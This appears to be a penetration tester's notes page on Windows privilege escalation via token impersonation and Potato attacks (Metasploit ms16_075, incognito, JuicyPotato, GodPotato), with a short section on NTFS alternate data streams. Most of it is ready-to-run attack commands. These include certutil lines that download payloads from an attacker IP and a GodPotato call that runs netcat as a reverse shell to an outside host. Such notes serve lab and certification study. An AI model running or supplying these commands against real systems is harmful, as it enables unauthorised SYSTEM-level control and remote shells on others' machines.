Impersonation and Potato Attacks

Token Impersonation Overview

Token impersonation explained

HTB Machine Jeeves
LogoWindows - Privilege Escalation - Internal All The Things

Potato Attack Overview

High level Overview from foxglovesecurity

Escalation via Potato Attack

After getting a meterpreter shell

background
use exploit/windows/local/ms16_075_reflection
set LHOST tun0
set LPORT 1738        <-- Something different from the first shell
exploit

Inside of new meterpreter shell

load incognito
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"
shell
whoami

Manual Juicy Potato Attack

cd C:\Windows\System32\spool\drivers\color\
certutil.exe -urlcache -f http://10.9.209.91/JuicyPotato.exe juicy.exe
certutil.exe -urlcache -f http://10.9.209.91/shell.exe
juicy.exe -t * -c {8BC3F05E-D86B-11D0-A075-00C04FB68820} -l 1337 -p "C:\Windows\System32\spool\drivers\color\shell.exe"

GOD POTATO

godpotato.exe -cmd "cmd /c whoami"

.\godpotato.exe -cmd "C:\programdata\nc.exe -t -e C:\Windows\System32\cmd.exe 192.168.45.214 1338"

Resources

https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe
LogoRotten Potato – Privilege Escalation from Service Accounts to SYSTEMfoxglovesec
Technical Overview
LogoGitHub - ohpe/juicy-potato: A sugared version of RottenPotatoNG, with a bit of juice, i.e. another Local Privilege Escalation tool, from a Windows Service Accounts to NT AUTHORITY\SYSTEM.GitHub
Other Version
LogoJuicyPotatoHackTricks

Bonus

Alternate Data Streams

Alternate datastreams are a file attribute in NTFS only. Regular data stream is primary text inside of a file. Alternate is a way to hide informtion inside of a file

dir /r
more hm.txt:root.txt:$DATA
LogoIntroduction to Alternate Data StreamsMalwarebytes Labs
PreviousUnquoted Service PathsNextRegisty

Last updated